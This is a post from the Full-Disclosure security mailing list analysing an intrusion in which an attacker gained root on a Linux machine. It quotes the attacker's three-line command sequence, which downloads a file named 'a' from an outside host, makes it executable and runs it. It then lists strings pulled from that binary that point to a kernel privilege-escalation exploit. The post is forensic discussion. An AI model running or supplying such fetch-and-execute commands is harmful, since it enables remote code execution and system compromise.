Todd Towles wrote:
It could be, but he said it was patched. I didn't run the test of
course. I never said it was the kernel however, it could be a service
running.
And unknown does not equal zero-day. But the tool got root and he
doesn't know how. That is the point. Kernel, old service, whatever. It
would be nice to find it.
If you take a look at this bit:
wget www.bo2k-rulez.net/a
chmod +x a
./a
The file "a" gives every superficial indication that it's a kernel
exploit, if you want to go by a 20-second Notepad analysis:
[-] Unable to exit, entering neverending loop.
Kernel seems not to be vulnerable double allocation
Unable to determine kernel address Unable to set up LDT Unable
to change page protection Invalid LDT entry Unable to jump to call gate
/bin/sh Unable to spawn shell
PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to allocate
memory Unable to unmap stack Unable to expand BSS
/proc/sys/kernel/osrelease FATAL: kernel too old
FATAL: cannot determine library version
/dev/null ;’��;’��(’��„’��Œ’�� malloc: using
debugging hooks
realloc(): invalid pointer %p!
malloc: top chunk is corrupt
Arena %d:
system bytes = %10u
in use bytes = %10u
Total (incl. mmap):
max mmap regions = %10u
max mmap bytes = %10lu
free(): invalid pointer %p!
TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_
BB
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html